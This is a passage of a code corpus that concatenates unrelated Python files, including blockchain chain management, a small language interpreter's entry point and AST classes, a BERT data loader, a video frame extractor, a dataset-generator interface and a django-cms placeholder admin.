self.state = self.mk_poststate_of_blockhash(
self.db.get('head_hash'))
self.state.executing_on_head = True
print('Initializing chain from saved head, #%d (%s)' %
(self.state.prev_headers[0].number, encode_hex(self.state.prev_headers[0].hash)))
elif genesis is None:
raise Exception("Need genesis decl!")
elif isinstance(genesis, State):
assert env is None
self.state = genesis
self.env = self.state.env
print('Initializing chain from provided state')
reset_genesis = True
elif "extraData" in genesis:
self.state = state_from_genesis_declaration(
genesis, self.env, executing_on_head=True)
reset_genesis = True
print('Initializing chain from provided genesis declaration')
elif "prev_headers" in genesis:
self.state = State.from_snapshot(
genesis, self.env, executing_on_head=True)
reset_genesis = True
print('Initializing chain from provided state snapshot, %d (%s)' %
(self.state.block_number, encode_hex(self.state.prev_headers[0].hash[:8])))
elif isinstance(genesis, dict):
print('Initializing chain from new state based on alloc')
self.state = mk_basic_state(genesis, {
"number": kwargs.get('number', 0),
"gas_limit": kwargs.get('gas_limit', self.env.config['BLOCK_GAS_LIMIT']),
"gas_used": kwargs.get('gas_used', 0),
"timestamp": kwargs.get('timestamp', 1467446877),
"difficulty": kwargs.get('difficulty', 2**25),
"hash": kwargs.get('prevhash', '00' * 32),
"uncles_hash": kwargs.get('uncles_hash', '0x' + encode_hex(BLANK_UNCLES_HASH))
}, self.env)
reset_genesis = True
assert self.env.db == self.state.db
initialize(self.state)
self.new_head_cb = new_head_cb
if self.state.block_number == 0:
assert self.state.block_number == self.state.prev_headers[0].number
else:
assert self.state.block_number - 1 == self.state.prev_headers[0].number
if reset_genesis:
if isinstance(self.state.prev_headers[0], FakeHeader):
header = self.state.prev_headers[0].to_block_header()
else:
header = self.state.prev_headers[0]
self.genesis = Block(header)
self.state.prev_headers[0] = header
initialize_genesis_keys(self.state, self.genesis)
else:
self.genesis = self.get_block_by_number(0)
self.head_hash = self.state.prev_headers[0].hash
self.time_queue = []
self.parent_queue = {}
self.localtime = time.time() if localtime is None else localtime
self.max_history = max_history
# Head (tip) of the chain
@property
def head(self):
try:
block_rlp = self.db.get(self.head_hash)
if block_rlp == b'GENESIS':
return self.genesis
else:
return rlp.decode(block_rlp, Block)
except Exception as e:
log.error(e)
return None
# Returns the post-state of the block
def mk_poststate_of_blockhash(self, blockhash):
if blockhash not in self.db:
raise Exception("Block hash %s not found" % encode_hex(blockhash))
block_rlp = self.db.get(blockhash)
if block_rlp == b'GENESIS':
return State.from_snapshot(json.loads(
self.db.get(b'GENESIS_STATE')), self.env)
block = rlp.decode(block_rlp, Block)
state = State(env=self.env)
state.trie.root_hash = block.header.state_root
update_block_env_variables(state, block)
state.gas_used = block.header.gas_used
state.txindex = len(block.transactions)
state.recent_uncles = {}
state.prev_headers = []
b = block
header_depth = state.config['PREV_HEADER_DEPTH']
for i in range(header_depth + 1):
state.prev_headers.append(b.header)
if i < 6:
state.recent_uncles[state.block_number - i] = []
for u in b.uncles:
state.recent_uncles[state.block_number - i].append(u.hash)
try:
b = rlp.decode(state.db.get(b.header.prevhash), Block)
except BaseException:
break
if i < header_depth:
if state.db.get(b.header.prevhash) == b'GENESIS':
jsondata = json.loads(state.db.get(b'GENESIS_STATE'))
for h in jsondata["prev_headers"][:header_depth - i]:
state.prev_headers.append(dict_to_prev_header(h))
for blknum, uncles in jsondata["recent_uncles"].items():
if int(blknum) >= state.block_number - \
int(state.config['MAX_UNCLE_DEPTH']):
state.recent_uncles[blknum] = [
parse_as_bin(u) for u in uncles]
else:
raise Exception("Dangling prevhash")
assert len(state.journal) == 0, state.journal
return state
# Gets the parent block of a given block
def get_parent(self, block):
if block.header.number == int(self.db.get(b'GENESIS_NUMBER')):
return None
return self.get_block(block.header.prevhash)
# Gets the block with a given blockhash
def get_block(self, blockhash):
try:
block_rlp = self.db.get(blockhash)
if block_rlp == b'GENESIS':
if not hasattr(self, 'genesis'):
self.genesis = rlp.decode(
self.db.get(b'GENESIS_RLP'), sedes=Block)
return self.genesis
else:
return rlp.decode(block_rlp, Block)
except Exception as e:
log.debug("Failed to get block", hash=blockhash, error=e)
return None
# Add a record allowing you to later look up the provided block's
# parent hash and see that it is one of its children
def add_child(self, child):
try:
existing = self.db.get(b'child:' + child.header.prevhash)
except BaseException:
existing = b''
existing_hashes = []
for i in range(0, len(existing), 32):
existing_hashes.append(existing[i: i + 32])
if child.header.hash not in existing_hashes:
self.db.put(
b'child:' + child.header.prevhash,
existing + child.header.hash)
# Gets the hash of the block with the given block number
def get_blockhash_by_number(self, number):
try:
return self.db.get(b'block:%d' % number)
except BaseException:
return None
# Gets the block with the given block number
def get_block_by_number(self, number):
return self.get_block(self.get_blockhash_by_number(number))
# Get the hashes of all known children of a given block
def get_child_hashes(self, blockhash):
o = []
try:
data = self.db.get(b'child:' + blockhash)
for i in range(0, len(data), 32):
o.append(data[i:i + 32])
return o
except BaseException:
return []
# Get the children of a block
def get_children(self, block):
if isinstance(block, Block):
block = block.header.hash
if isinstance(block, BlockHeader):
block = block.hash
return [self.get_block(h) for h in self.get_child_hashes(block)]
# Get the score (AKA total difficulty in PoW) of a given block
def get_score(self, block):
if not block:
return 0
key = b'score:' + block.header.hash
fills = []
while key not in self.db:
fills.insert(0, (block.header.hash, block.difficulty))
key = b'score:' + block.header.prevhash
block = self.get_parent(block)
score = int(self.db.get(key))
for h, d in fills:
key = b'score:' + h
score = score + d + random.randrange(d // 10**6 + 1)
self.db.put(key, str(score))
return score
# This function should be called periodically so as to
# process blocks that were received but laid aside because
# they were received too early
def process_time_queue(self, new_time=None):
self.localtime = time.time() if new_time is None else new_time
i = 0
while i < len(
self.time_queue) and self.time_queue[i].timestamp <= self.localtime:
log.info('Adding scheduled block')
pre_len = len(self.time_queue)
self.add_block(self.time_queue.pop(i))
if len(self.time_queue) == pre_len:
i += 1
# Call upon receiving a block
def add_block(self, block):
now = self.localtime
# Are we receiving the block too early?
if block.header.timestamp > now:
i = 0
while i < len(
self.time_queue) and block.timestamp > self.time_queue[i].timestamp:
i += 1
self.time_queue.insert(i, block)
log.info('Block received too early (%d vs %d). Delaying for %d seconds' %
(now, block.header.timestamp, block.header.timestamp - now))
return False
# Is the block being added to the head?
if block.header.prevhash == self.head_hash:
log.info('Adding to head',
head=encode_hex(block.header.prevhash[:4]))
self.state.deletes = []
self.state.changed = {}
try:
apply_block(self.state, block)
except (AssertionError, KeyError, ValueError, InvalidTransaction, VerificationFailed) as e:
log.info('Block %d (%s) with parent %s invalid, reason: %s' %
(block.number, encode_hex(block.header.hash[:4]), encode_hex(block.header.prevhash[:4]), str(e)))
return False
self.db.put(b'block:%d' % block.header.number, block.header.hash)
# side effect: put 'score:' cache in db
block_score = self.get_score(block)
self.head_hash = block.header.hash
for i, tx in enumerate(block.transactions):
self.db.put(b'txindex:' +
tx.hash, rlp.encode([block.number, i]))
assert self.get_blockhash_by_number(
block.header.number) == block.header.hash
deletes = self.state.deletes
changed = self.state.changed
# Or is the block being added to a chain that is not currently the
# head?
elif block.header.prevhash in self.env.db:
log.info('Receiving block %d (%s) not on head (%s), adding to secondary post state %s' %
(block.number, encode_hex(block.header.hash[:4]),
encode_hex(self.head_hash[:4]), encode_hex(block.header.prevhash[:4])))
temp_state = self.mk_poststate_of_blockhash(block.header.prevhash)
try:
apply_block(temp_state, block)
except (AssertionError, KeyError, ValueError, InvalidTransaction, VerificationFailed) as e:
log.info('Block %s with parent %s invalid, reason: %s' %
(encode_hex(block.header.hash[:4]), encode_hex(block.header.prevhash[:4]), str(e)))
return False
deletes = temp_state.deletes
block_score = self.get_score(block)
changed = temp_state.changed
# If the block should be the new head, replace the head
if block_score > self.get_score(self.head):
b = block
new_chain = {}
# Find common ancestor
while b.header.number >= int(self.db.get(b'GENESIS_NUMBER')):
new_chain[b.header.number] = b
key = b'block:%d' % b.header.number
orig_at_height = self.db.get(
key) if key in self.db else None
if orig_at_height == b.header.hash:
break
if b.prevhash not in self.db or self.db.get(
b.prevhash) == b'GENESIS':
break
b = self.get_parent(b)
replace_from = b.header.number
# Replace block index and tx indices, and edit the state cache
# Get a list of all accounts that have been edited along the old and
# new chains
changed_accts = {}
# Read: for i in range(common ancestor block number...new block
# number)
for i in itertools.count(replace_from):
log.info('Rewriting height %d' % i)
key = b'block:%d' % i
# Delete data for old blocks
orig_at_height = self.db.get(
key) if key in self.db else None
if orig_at_height:
orig_block_at_height = self.get_block(orig_at_height)
log.info(
'%s no longer in main chain' %
encode_hex(
orig_block_at_height.header.hash))
# Delete from block index
self.db.delete(key)
# Delete from txindex
for tx in orig_block_at_height.transactions:
if b'txindex:' + tx.hash in self.db:
self.db.delete(b'txindex:' + tx.hash)
# Add to changed list
acct_list = self.db.get(
b'changed:' + orig_block_at_height.hash)
for j in range(0, len(acct_list), 20):
changed_accts[acct_list[j: j + 20]] = True
# Add data for new blocks
if i in new_chain:
new_block_at_height = new_chain[i]
log.info(
'%s now in main chain' %
encode_hex(
new_block_at_height.header.hash))
# Add to block index
self.db.put(key, new_block_at_height.header.hash)
# Add to txindex
for j, tx in enumerate(
new_block_at_height.transactions):
self.db.put(b'txindex:' + tx.hash,
rlp.encode([new_block_at_height.number, j]))
# Add to changed list
if i < b.number:
acct_list = self.db.get(
b'changed:' + new_block_at_height.hash)
for j in range(0, len(acct_list), 20):
changed_accts[acct_list[j: j + 20]] = True
if i not in new_chain and not orig_at_height:
break
# Add changed list from new head to changed list
for c in changed.keys():
changed_accts[c] = True
# Update the on-disk state cache
for addr in changed_accts.keys():
data = temp_state.trie.get(addr)
if data:
self.state.db.put(b'address:' + addr, data)
else:
try:
self.state.db.delete(b'address:' + addr)
except KeyError:
pass
self.head_hash = block.header.hash
self.state = temp_state
self.state.executing_on_head = True
# Block has no parent yet
else:
if block.header.prevhash not in self.parent_queue:
self.parent_queue[block.header.prevhash] = []
self.parent_queue[block.header.prevhash].append(block)
log.info('Got block %d (%s) with prevhash %s, parent not found. Delaying for now' %
(block.number, encode_hex(block.hash[:4]), encode_hex(block.prevhash[:4])))
return False
self.add_child(block)
self.db.put(b'head_hash', self.head_hash)
self.db.put(block.hash, rlp.encode(block))
self.db.put(b'changed:' + block.hash,
b''.join([k.encode() if not is_string(k) else k for k in list(changed.keys())]))
print('Saved %d address change logs' % len(changed.keys()))
self.db.put(b'deletes:' + block.hash, b''.join(deletes))
log.debug('Saved %d trie node deletes for block %d (%s)' %
(len(deletes), block.number, utils.encode_hex(block.hash)))
# Delete old junk data
old_block_hash = self.get_blockhash_by_number(
block.number - self.max_history)
if old_block_hash:
try:
deletes = self.db.get(b'deletes:' + old_block_hash)
log.debug(
'Deleting up to %d trie nodes' %
(len(deletes) // 32))
rdb = RefcountDB(self.db)
for i in range(0, len(deletes), 32):
rdb.delete(deletes[i: i + 32])
self.db.delete(b'deletes:' + old_block_hash)
self.db.delete(b'changed:' + old_block_hash)
except KeyError as e:
print(e)
pass
self.db.commit()
assert (b'deletes:' + block.hash) in self.db
log.info('Added block %d (%s) with %d txs and %d gas' %
(block.header.number, encode_hex(block.header.hash)[:8],
len(block.transactions), block.header.gas_used))
# Call optional callback
if self.new_head_cb and block.header.number != 0:
self.new_head_cb(block)
# Are there blocks that we received that were waiting for this block?
# If so, process them.
if block.header.hash in self.parent_queue:
for _blk in self.parent_queue[block.header.hash]:
self.add_block(_blk)
del self.parent_queue[block.header.hash]
return True
def __contains__(self, blk):
if isinstance(blk, (str, bytes)):
try:
blk = rlp.decode(self.db.get(blk), Block)
except BaseException:
return False
try:
o = self.get_block(self.get_blockhash_by_number(blk.number)).hash
assert o == blk.hash
return True
except Exception as e:
return False
def has_block(self, block):
return block in self
def has_blockhash(self, blockhash):
return blockhash in self.db
def get_chain(self, frm=None, to=2**63 - 1):
if frm is None:
frm = int(self.db.get(b'GENESIS_NUMBER')) + 1
chain = []
for i in itertools.islice(itertools.count(), frm, to):
h = self.get_blockhash_by_number(i)
if not h:
return chain
chain.append(self.get_block(h))
# Get block number and transaction index
def get_tx_position(self, tx):
if not isinstance(tx, (str, bytes)):
tx = tx.hash
if b'txindex:' + tx in self.db:
data = rlp.decode(self.db.get(b'txindex:' + tx))
return big_endian_to_int(data[0]), big_endian_to_int(data[1])
else:
return None
def get_transaction(self, tx):
print('Deprecated. Use get_tx_position')
blknum, index = self.get_tx_position(tx)
blk = self.get_block_by_number(blknum)
return blk.transactions[index], blk, index
# Get descendants of a block
def get_descendants(self, block):
output = []
blocks = [block]
while len(blocks):
b = blocks.pop()
blocks.extend(self.get_children(b))
output.append(b)
return output
@property
def db(self):
return self.env.db
# Get blockhashes starting from a hash and going backwards
def get_blockhashes_from_hash(self, blockhash, max_num):
block = self.get_block(blockhash)
if block is None:
return []
header = block.header
hashes = []
for i in range(max_num):
block = self.get_block(header.prevhash)
if block is None:
break
header = block.header
hashes.append(header.hash)
if header.number == 0:
break
return hashes
@property
def config(self):
return self.env.config
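# A minimal usage sketch (not from the original file; the alloc contents and the
# surrounding setup are illustrative assumptions only): a Chain is built once and
# then fed blocks as they arrive.
#
#   chain = Chain(genesis={some_address: {"balance": 10**18}}, reset_genesis=True)
#   if chain.add_block(candidate_block):      # True if the block was accepted
#       print(chain.head_hash)
#   chain.process_time_queue()                # retry blocks that arrived too early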
``` |
{
"source": "jink-lang/jink",
"score": 3
} |
#### File: jink-lang/jink/jink.py
```python
import sys, argparse
from jink import optimizer
from jink.lexer import Lexer
from jink.parser import Parser
from jink.optimizer import optimize
from jink.interpreter import Interpreter, Environment
from jink.repl import REPL
# from jink.compiler import Compiler
def get_code_from_path(path):
if not path.endswith('.jk'):
path += '.jk'
code = open(path).read()
if not code:
raise Exception(f"Error reading file {sys.argv[0]}")
return code
if len(sys.argv) >= 1 and sys.argv[0] == 'jink.py':
sys.argv.pop(0)
verbose = False
to_compile = False
if '-v' in sys.argv:
sys.argv.remove('-v')
verbose = True
if '-c' in sys.argv:
sys.argv.remove('-c')
# Launch REPL
if len(sys.argv) == 0 or (len(sys.argv) == 1 and sys.argv[0] == '-v'):
print("jink REPL - use '[jink] help' for help - type 'exit' to exit.")
repl = REPL(sys.stdin, sys.stdout, verbose=verbose)
repl.main_loop()
elif len(sys.argv) >= 1:
if sys.argv[0] == 'help':
print('\n'.join([
"jink - strongly typed, JavaScript-like programming language.",
"https://www.github.com/jink-lang/jink",
"",
"args:",
" > -v -- verbose; will output AST." # and if compiling, both optimized and unoptimized LLVM IR.",
# " > -c -- compile; will use compiler instead of interpreter."
"",
"usage:",
" > [jink] help -- shows this prompt.",
" > [jink] path/to/file[.jk] -- executes interpreter on file.",
" > [jink] -v path/to/file[.jk] -- executes interpreter on file verbose mode.",
# " > [jink] -c path/to/file[.jk] -- executes compiler on file.",
# " > [jink] -c -v path/to/file[.jk] -- executes compiler on file in verbose mode.",
" > [jink] -- launches interpreted interactive REPL.",
" > [jink] -v -- launches interpreted interactive REPL in verbose mode."
]))
else:
path = ' '.join(sys.argv)
code = get_code_from_path(path)
if to_compile:
raise NotImplementedError("Compiler not yet implemented.")
# Compiler()._eval(code, optimize=True, verbose=verbose)
else:
AST = optimize(Parser().parse(Lexer().parse(code), verbose=verbose))
env = Environment()
env.add_builtins()
Interpreter().evaluate(AST, env)
if __name__ == "__main__":
pass
```
#### File: jink/utils/classes.py
```python
from jink.utils.evals import *
from enum import Enum
class TokenType(Enum):
EOF = 0
NEWLINE = 1
KEYWORD = 2
IDENTIFIER = 3
NUMBER = 4
STRING = 5
OPERATOR = 6
LPAREN = 7
RPAREN = 8
LBRACKET = 9
RBRACKET = 10
LBRACE = 11
RBRACE = 12
SEMICOLON = 13
COLON = 14
COMMA = 15
class Token:
def __init__(self, _type, value, line, pos):
self.type, self.value, self.line, self.pos = _type, value, line, pos
def __str__(self):
return f"{{ 'type': 'Token<{self.type}>', 'contents': {{ 'value': '{self.value}', 'line': {self.line}, 'pos': {self.pos} }} }}"
def smallStr(self):
return f"{{{self.type} {self.value}}}"
__repr__ = __str__
class BinaryOperator:
__slots__ = ('operator', 'left', 'right')
def __init__(self, operator, left, right):
self.operator, self.left, self.right = operator, left, right
class UnaryOperator:
__slots__ = ('operator', 'value')
def __init__(self, operator, value):
self.operator, self.value = operator, value
class IntegerLiteral:
__slots__ = ('value')
def __init__(self, value):
self.value = value
class FloatingPointLiteral:
__slots__ = ('value')
def __init__(self, value):
self.value = value
class StringLiteral:
__slots__ = ('value')
def __init__(self, value):
self.value = value
class BooleanLiteral:
__slots__ = ('value')
def __init__(self, value):
self.value = value
class IdentLiteral:
def __init__(self, name, index={ 'type': None, 'index': None }):
self.name, self.index = name, index
class Null:
def __init__(self, value):
self.value = "null"
class Assignment:
__slots__ = ('type', 'ident', 'value')
def __init__(self, _type, ident, value):
self.type, self.ident, self.value = _type, ident, value
class CallExpression:
__slots__ = ('name', 'args')
def __init__(self, name, args):
self.name, self.args = name, args
class Function:
__slots__ = ('name', 'params', 'body')
def __init__(self, name, params, body):
self.name, self.params, self.body = name, params, body
class FunctionParameter:
__slots__ = ('name', 'type', 'default')
def __init__(self, name, _type, default=None):
self.name, self.type, self.default = name, _type, default
class Return:
__slots__ = ('value')
def __init__(self, value):
self.value = value
class Conditional:
__slots__ = ('type', 'expression', 'body', 'else_body')
def __init__(self, _type, expression, body, else_body):
self.type, self.expression, self.body, self.else_body = _type, expression, body, else_body
class Module:
__slots__ = ('name', 'index')
def __init__(self, name, index):
self.name, self.index = name, index
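# Illustration (not part of the original file): a parsed expression such as
# `1 + 2` would be represented with the node classes above roughly as
#   BinaryOperator('+', IntegerLiteral(1), IntegerLiteral(2))
# and a call `f(x)` roughly as CallExpression('f', [IdentLiteral('x')]).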
``` |
{
"source": "jinkookchoi/bert-classifier",
"score": 3
} |
#### File: bert-classifier/single_label/data_loader.py
```python
import torch
from torch.utils.data import Dataset
from torchtext import data
# DataLoader class
# TokenizerWrapper class
class TokenizerWrapper():
def __init__(self, tokenizer, max_length):
self.tokenizer = tokenizer
self.max_length = max_length
def collate(self, samples):
texts = [s['text'] for s in samples]
labels = [s['label'] for s in samples]
encoding = self.tokenizer(
texts,
padding=True,
truncation=True,
return_tensors='pt',
max_length=self.max_length
)
return {
'text': texts,
'input_ids': encoding['input_ids'],
'attention_mask': encoding['attention_mask'],
'labels': torch.tensor(labels, dtype=torch.long)
}
class BertDataset(Dataset):
def __init__(self, texts, labels):
self.texts = texts
self.labels = labels
def __len__(self):
return len(self.texts)
def __getitem__(self, item):
text = str(self.texts[item])
label = self.labels[item]
return {
'text': text,
'label': label,
}
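# A usage sketch (not part of the original module). It assumes a HuggingFace
# tokenizer; the model name and sample data below are illustrative only.
if __name__ == "__main__":
    from torch.utils.data import DataLoader
    from transformers import AutoTokenizer  # assumed dependency

    tokenizer = AutoTokenizer.from_pretrained("bert-base-uncased")
    dataset = BertDataset(texts=["a positive example", "a negative example"],
                          labels=[1, 0])
    wrapper = TokenizerWrapper(tokenizer, max_length=64)
    loader = DataLoader(dataset, batch_size=2, collate_fn=wrapper.collate)
    for batch in loader:
        # input_ids/attention_mask are (batch, seq_len) tensors, labels is (batch,)
        print(batch["input_ids"].shape, batch["labels"])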
``` |
{
"source": "Jinksi/SelFlow",
"score": 3
} |
#### File: Jinksi/SelFlow/extract_video_frames.py
```python
import os
import argparse
import math
import json
import time
import sys
import subprocess
def printJson(data):
print(json.dumps(data))
sys.stdout.flush()
time.sleep(0.1)
def extract_video_frames(input, output_dir, fps):
input_filename = os.path.splitext(os.path.basename(input))[0]
if output_dir:
os.makedirs(output_dir, exist_ok=True)
subprocess.run(
[
"ffmpeg",
"-hide_banner",
"-i",
input,
"-vf",
f"fps={fps}",
"-qscale:v",
"2",
os.path.join(output_dir, f"{input_filename}_{fps}fps_%06d.jpg"),
]
)
print("==================")
print(
"Video frames extracted to",
os.path.join(output_dir, f"{input_filename}_{fps}fps_%06d.jpg"),
)
print("==================")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Extract video frames from a video")
parser.add_argument("--input", default="./videos/video_test.mov/", required=True)
parser.add_argument("--output_dir", default="./output/video_frames/", required=True)
parser.add_argument("--fps", default=25, type=int)
args = parser.parse_args()
extract_video_frames(args.input, args.output_dir, args.fps)
# python extract_video_frames.py --input=videos/video_test.mov --output_dir=output/video_frames --fps=25
``` |
{
"source": "jinksunk/InfosecDatasetCreationTools",
"score": 3
} |
#### File: evtgen/datasources/datasourceinterface.py
```python
import uuid
import logging
import sys
class DataGenerator(object):
'''
Represents a general generator of data instances.
It is intended that the __init__ constructors will take in the required
parameter information
'''
mylog = logging.getLogger(__name__)
class DataStore(object):
'''
Represents a general generator of data instances.
It is intended that the __init__ constructors will take in the required
parameter information
'''
mylog = logging.getLogger(__name__)
def __init__(self):
'''
Interface Constructor
'''
self.event_list = list()
self.data_list = list()
def add_event(self, event):
'''
Interface Definition - will add the event to the set of events from which data will be
stored.
'''
self.mylog.debug("Adding event {} to event_list".format( event.get_id()))
self.event_list.append(event)
self.mylog.debug("Now contains {} data elements (timestamps: {} )".format(
len(self.get_datalist()),
",".join(x.get_time() for x in self.get_datalist())))
def get_events(self):
'''
Return a list of events stored in this data store:
'''
return self.event_list
def length(self):
'''
Return the number of events that will be written with this data generator
'''
return len(self.event_list)
def write(self, target):
'''
Interface Definition - will store the generated data instances appropriately to the datasource type;
e.g. pcaps generated will be written to files. The 'target' argument is the specifier for where
the data should be written to.
'''
self.mylog.error("Interface unimplemented. Use a subclass instead.")
sys.exit(1)
def get_datalist(self):
'''
Return the list of data instances added to the store. Data instances are subclassed from DataElement.
'''
dilist = list()
self.mylog.debug("Datasource {} contains {} events".format(self.supported_source, len(self.event_list)))
for ev in self.event_list:
dtmp = ev.get_datainstances(self.supported_source)
self.mylog.debug("Adding {} data instances for event {}".format(
len(dtmp), ev.get_id()))
if len(dtmp) > 0:
dilist.extend(dtmp)
return dilist
class DataElement(object):
'''
An abstracted data element which can be used with DataGenerators in a generic way
'''
mylog = logging.getLogger(__name__)
def __init__(self, timestamp, eventid, rawdataelement):
'''
Initialize the data element with a timestamp, associated event identifier, and unique ID
'''
self.elementid = self._generate_id()
self.timestamp = timestamp
self.eventid = eventid
self.rawelement = rawdataelement
def get_timestamp(self):
'''
Return the timestamp for this data element
'''
return self.timestamp
def get_uniqid(self):
'''
Return the unique GUID for this data element
'''
return self.uniqid
def get_raw_element(self):
'''
Get the encapsulated data element.
'''
return self.rawelement
def _generate_id(self):
'''
This base method simply generates a type-4 UUID. If a different type of ID is desired, this can
be overridden
'''
self.uniqid = uuid.uuid4()
class LabelFile(object):
'''
An abstract class representing a label file in KIDS - each data source should have a corresponding
LabelFile implementation that records the unique IDs of each event and the data instances in
the data source that correspond to that event.
'''
mylog = logging.getLogger(__name__)
def __init__(self, datasource):
'''
Initialize with a reference to the data source we are a label for.
'''
self.datasource = datasource
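# A minimal sketch of a concrete DataStore (not part of the original module;
# the class name, source tag, and plain-text output format are assumptions):
class ExampleTextDataStore(DataStore):
    supported_source = "exampletext"  # tag passed to each event's get_datainstances()

    def write(self, target):
        # One line per generated data element: "<timestamp> <event id>"
        with open(target, "w") as outfile:
            for element in self.get_datalist():
                outfile.write("{} {}\n".format(element.get_timestamp(), element.eventid))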
``` |
{
"source": "jinktv/django-cms",
"score": 2
} |
#### File: cms/admin/placeholderadmin.py
```python
from cms.forms.fields import PlaceholderFormField
from cms.models.fields import PlaceholderField
from cms.models.placeholdermodel import Placeholder
from cms.models.pluginmodel import CMSPlugin
from cms.plugin_pool import plugin_pool
from cms.utils import get_language_from_request, cms_static_url, get_cms_setting
from cms.utils.permissions import has_plugin_permission
from copy import deepcopy
from django.conf import settings
from django.contrib.admin import ModelAdmin
from django.http import (HttpResponse, Http404, HttpResponseBadRequest,
HttpResponseForbidden)
from django.shortcuts import render_to_response, get_object_or_404
from django.template import RequestContext
from django.template.defaultfilters import force_escape, escapejs
from django.utils.translation import ugettext as _
from cms.templatetags.cms_admin import admin_static_url
class PlaceholderAdmin(ModelAdmin):
class Media:
css = {
'all': [cms_static_url(path) for path in (
'css/rte.css',
'css/pages.css',
'css/change_form.css',
'css/jquery.dialog.css',
'css/plugin_editor.css',
)]
}
js = [cms_static_url(path) for path in [
'js/plugins/admincompat.js',
'js/csrf.js',
'js/libs/jquery.query.js',
'js/libs/jquery.ui.core.js',
'js/libs/jquery.ui.dialog.js',
]
]
def get_fieldsets(self, request, obj=None):
"""
Get fieldsets to enforce correct fieldsetting of placeholder fields
"""
form = self.get_form(request, obj)
placeholder_fields = self._get_placeholder_fields(form)
if self.declared_fieldsets:
# check those declared fieldsets
fieldsets = list(deepcopy(self.declared_fieldsets))
for label, fieldset in fieldsets:
fields = list(fieldset['fields'])
for field in fieldset['fields']:
if field in placeholder_fields:
if (len(fieldset['fields']) == 1 and
'classes' in fieldset and
'plugin-holder' in fieldset['classes'] and
'plugin-holder-nopage' in fieldset['classes']):
placeholder_fields.remove(field)
else:
fields.remove(field)
if fields:
fieldset['fields'] = fields
else:
# no fields in the fieldset anymore, delete the fieldset
fieldsets.remove((label, fieldset))
for placeholder in placeholder_fields:
fieldsets.append((self.get_label_for_placeholder(placeholder), {
'fields': (placeholder,),
'classes': ('plugin-holder', 'plugin-holder-nopage',),
},))
return fieldsets
fieldsets = []
fieldsets.append((None, {'fields': [f for f in form.base_fields.keys() if not f in placeholder_fields]}))
for placeholder in placeholder_fields:
fieldsets.append((self.get_label_for_placeholder(placeholder), {
'fields': (placeholder,),
'classes': ('plugin-holder', 'plugin-holder-nopage',),
}))
readonly_fields = self.get_readonly_fields(request, obj)
if readonly_fields:
fieldsets.append((None, {'fields': list(readonly_fields)}))
return fieldsets
def get_label_for_placeholder(self, placeholder):
return ' '.join([x.capitalize() for x in self.model._meta.get_field_by_name(placeholder)[0].verbose_name.split(' ')])
def formfield_for_dbfield(self, db_field, **kwargs):
"""
Hook for specifying the form Field instance for a given database Field
instance.
If kwargs are given, they're passed to the form Field's constructor.
"""
if isinstance(db_field, PlaceholderField):
request = kwargs.pop("request", None)
return db_field.formfield_for_admin(request, self.placeholder_plugin_filter, **kwargs)
return super(PlaceholderAdmin, self).formfield_for_dbfield(db_field, **kwargs)
def placeholder_plugin_filter(self, request, queryset):
return queryset
def _get_placeholder_fields(self, form):
placeholder_fields = []
for key, value in form.base_fields.items():
if isinstance(value, PlaceholderFormField):
placeholder_fields.append(key)
return placeholder_fields
def get_urls(self):
"""
Register the plugin specific urls (add/edit/copy/remove/move)
"""
from django.conf.urls.defaults import patterns, url
info = "%s_%s" % (self.model._meta.app_label, self.model._meta.module_name)
pat = lambda regex, fn: url(regex, self.admin_site.admin_view(fn), name='%s_%s' % (info, fn.__name__))
url_patterns = patterns('',
pat(r'add-plugin/$', self.add_plugin),
pat(r'edit-plugin/([0-9]+)/$', self.edit_plugin),
pat(r'remove-plugin/$', self.remove_plugin),
pat(r'move-plugin/$', self.move_plugin),
pat(r'copy-plugins/$', self.copy_plugins),
)
return url_patterns + super(PlaceholderAdmin, self).get_urls()
def add_plugin(self, request):
# only allow POST
if request.method != "POST":
raise Http404
plugin_type = request.POST['plugin_type']
if not has_plugin_permission(request.user, plugin_type, "add"):
return HttpResponseForbidden("You don't have permission to add plugins")
placeholder_id = request.POST.get('placeholder', None)
position = None
language = get_language_from_request(request)
parent = None
# check if we got a placeholder (id)
if placeholder_id:
placeholder = get_object_or_404(Placeholder, pk=placeholder_id)
else: # else get the parent_id
parent_id = request.POST.get('parent_id', None)
if not parent_id: # if we get neither a placeholder nor a parent, bail out
raise Http404
parent = get_object_or_404(CMSPlugin, pk=parent_id)
placeholder = parent.placeholder
# check add permissions on placeholder
if not placeholder.has_add_permission(request):
return HttpResponseForbidden(_("You don't have permission to add content here."))
# check the limits defined in CMS_PLACEHOLDER_CONF for this placeholder
limits = get_cms_setting('PLACEHOLDER_CONF').get(placeholder.slot, {}).get('limits', None)
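# The placeholder conf is expected to look roughly like (illustrative values):
#   CMS_PLACEHOLDER_CONF = {'content': {'limits': {'global': 5, 'TextPlugin': 1}}}
# 'global' caps all plugins in the slot; per-type keys cap individual plugin types.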
if limits:
count = placeholder.cmsplugin_set.count()
global_limit = limits.get("global", None)
type_limit = limits.get(plugin_type, None)
# check the global limit first
if global_limit and count >= global_limit:
return HttpResponseBadRequest(
"This placeholder already has the maximum number of plugins."
)
elif type_limit: # then check the type specific limit
type_count = CMSPlugin.objects.filter(
language=language, placeholder=placeholder, plugin_type=plugin_type
).count()
if type_count >= type_limit:
return HttpResponseBadRequest(
"This placeholder already has the maximum number (%s) "
"of %s plugins." % (type_limit, plugin_type)
)
# actually add the plugin
plugin = CMSPlugin(language=language, plugin_type=plugin_type,
position=position, placeholder=placeholder, parent=parent)
plugin.save()
# returns it's ID as response
return HttpResponse(str(plugin.pk))
def edit_plugin(self, request, plugin_id):
plugin_id = int(plugin_id)
# get the plugin to edit of bail out
cms_plugin = get_object_or_404(CMSPlugin, pk=plugin_id)
if not has_plugin_permission(request.user, cms_plugin.plugin_type, "change"):
return HttpResponseForbidden(_("You don't have permission to add plugins"))
# check that the user has permission to change this plugin
if not cms_plugin.placeholder.has_change_permission(request):
return HttpResponseForbidden(_("You don't have permission to add content here."))
instance, plugin_admin = cms_plugin.get_plugin_instance(self.admin_site)
plugin_admin.cms_plugin_instance = cms_plugin
plugin_admin.placeholder = cms_plugin.placeholder
if request.method == "POST":
# set the continue flag, otherwise plugin_admin will redirect to the list
# view, which doesn't actually exist
post_request = request.POST.copy()
post_request['_continue'] = True
request.POST = post_request
if request.POST.get("_cancel", False):
# cancel button was clicked
context = {
'CMS_MEDIA_URL': get_cms_setting('MEDIA_URL'),
'plugin': cms_plugin,
'is_popup': True,
'name': unicode(cms_plugin),
"type": cms_plugin.get_plugin_name(),
'plugin_id': plugin_id,
'icon': force_escape(escapejs(cms_plugin.get_instance_icon_src())),
